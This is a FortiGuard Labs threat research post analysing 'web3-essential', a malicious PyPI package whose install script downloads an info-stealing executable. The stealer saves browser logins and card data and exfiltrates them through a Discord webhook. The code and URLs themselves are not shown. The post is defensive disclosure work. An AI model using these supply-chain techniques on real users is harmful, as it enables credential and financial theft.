FortiGuard Labs Threat Research

Supply Chain Attack by New Malicious Python Package, “web3-essential”

By Jin Lee | February 02, 2023

The FortiGuard Labs team has discovered another new 0-day attack in a PyPI package (Python Package Index) called “web3-essential”. It was discovered on January 30, 2023, by monitoring an open-source ecosystem. The package was published on January 26, 2023, the same day as its author, ‘Trexon’, joined the repository. Given the frequency of this pattern of simultaneously joining and publishing, it may be a wise idea to take precautions for downloading packages published by newly joined authors.

The author included a brief description of the project along with a unique version number of ‘1.0.4b0’ as if to try and avoid suspicion.

Figure 1: Package author information

Figure 2: Project description

Figure 3: Package release history


The package includes malicious code in its installation script that downloads and runs an executable file as a part of its installation. 

Figure 4: script

The interesting element is the URL, which requires deeper analysis:


As shown in the VirusTotal entry below, the download URL includes the following binary exe (SHA 256): 


While this download URL is only detected by one vendor, a few vendors do flag the downloaded executable file as malicious.


Figure 5: According to VirusTotal, this URL is only detected by one vendor

Figure 6: Vendors that detect the downloaded executable ily.exe


The downloaded executable seems to be a Go-compiled executable file. Let’s try running it.

Figure 7: ily.exe running

One suspicious behavior conducted by ‘ily.exe’ is that it creates DB files in the ‘%USER%\AppData\Local\cloudflare-warp-cache\raw\’ folder. This may be used for recording sensitive user data and credentials.

Figure 8: Created DB files

Let’s take a look at the DB files below. We can safely assume they will be used for saving sensitive data and credentials, such as credit card and log-in information.

Figure 9: edge_login_data

Figure 10: edge_web_data

When we take a look inside the binary using IDA, we see many strings that raise suspicions. We can also get some clues about the malware behavior by observing these. Some keywords of interest include, ‘virus’, ‘wallets’, ‘browsers’, ‘login’, and ‘passwords’.

Figure 11a: Snippets of suspicious strings from IDA

Below we can also see some strings with ‘.zip’ for several browser names which could be indication of saving the sensitive information as a zip file.

Figure 11b: Snippet of strings from IDA

The examples in the code shown below are of the browsers that the malware takes an interest in. 

Figure 12: Snippet of IDA code of the browsers the malware takes an interest in

We also found an interesting URL embedded in the code:


It uses a Go package, ‘dishooks’, which is a Discord webhook API wrapper. Within the URL, we see that it may be related to a “Spidey Bot” malware which is known to steal personal information through Discord.


Figure 13: Snippet of IDA code for webhook

Figure 14: Webhook URL string

Figure 15: Content of the URL


In this blog, we saw a new author upload a malicious package on the same day as they joined. This package included a very simple python script that leads to downloading a malicious binary executable designed to steal sensitive information like credit cards and logins.

In our previous blogs looking at malicious PyPI packages, we have observed that malware authors commonly behave in this way. We have also learned that these malicious executable are also frequently compiled using a variety of compilers, such as Go-compiler or PyInstaller, etc.

Fortinet Protections

Python Package Index administrators have confirmed that after notification by FortiGuard Labs, this package has been taken down.

FortiGuard AntiVirus detects the malicious executables identified in this report as

ily.exe: W64/Stealer.679E!tr

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects the download URLs cited in this report as Malicious and blocks them.

If you think you’ve been impacted by this or any other cybersecurity threat, reach out to our Global FortiGuard Incident Response Team




Malicious URLs


Learn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard AI-powered security services portfolio.